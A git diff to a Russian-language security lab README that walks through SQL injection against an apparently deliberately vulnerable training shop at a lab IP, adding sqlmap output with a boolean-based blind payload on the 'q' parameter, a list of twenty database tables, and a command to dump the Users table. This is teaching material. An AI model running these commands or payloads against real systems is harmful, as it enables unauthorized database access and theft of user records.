diff --git a/labs/lab3/README.md b/labs/lab3/README.md index 2151138..8e41579 100644 --- a/labs/lab3/README.md +++ b/labs/lab3/README.md @@ -340,7 +340,25 @@ python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --level=3 - Если возникнет вопрос про WAF/IPS/IDS – отвечаем N. -Программа определит тип базы данных и предложит пропустить дальнейшие проверки, отвечаем Y. На вопрос про включение всех тестов – отвечаем N. Программа начнёт искать уязвимости в параметрах запроса. После обнаружения уязвимого параметра, отвечаем N на вопрос про проверку остальных параметров. В конечном итоге, получим информацию о типе базы данных и об уязвимых параметрах. Попробуем получить информацию о количестве и названии баз данных: +Программа определит тип базы данных и предложит пропустить дальнейшие проверки, отвечаем Y. На вопрос про включение всех тестов – отвечаем N. Программа начнёт искать уязвимости в параметрах запроса. После обнаружения уязвимого параметра, отвечаем N на вопрос про проверку остальных параметров. В конечном итоге, получим информацию о типе базы данных и об уязвимых параметрах. + +```ssh +... +--- +Parameter: q (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: q=') AND 9603=9603 AND ('SMUf' LIKE 'SMUf +--- +[12:44:52] [INFO] testing SQLite +[12:44:52] [INFO] confirming SQLite +[12:44:52] [INFO] actively fingerprinting SQLite +[12:44:52] [INFO] the back-end DBMS is SQLite +back-end DBMS: SQLite +... +``` + +Попробуем получить информацию о количестве и названии баз данных: ```ssh python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --dbs @@ -351,12 +369,40 @@ python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --dbs ```ssh python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= --tables + +... +[20 tables] ++-------------------+ +| Addresses | +| BasketItems | +| Baskets | +| Captchas | +| Cards | +| Challenges | +| Complaints | +| Deliveries | +| Feedbacks | +| ImageCaptchas | +| Memories | +| PrivacyRequests | +| Products | +| Quantities | +| Recycles | +| SecurityAnswers | +| SecurityQuestions | +| Users | +| Wallets | +| sqlite_sequence | ++-------------------+ +... ``` После получения таблиц можно попробовать получить данные. Попробуем получить список пользователей из таблицы Users ```ssh python sqlmap.py -u http://10.5.143.101:PORT/rest/products/search?q= -T Users --dump + + ```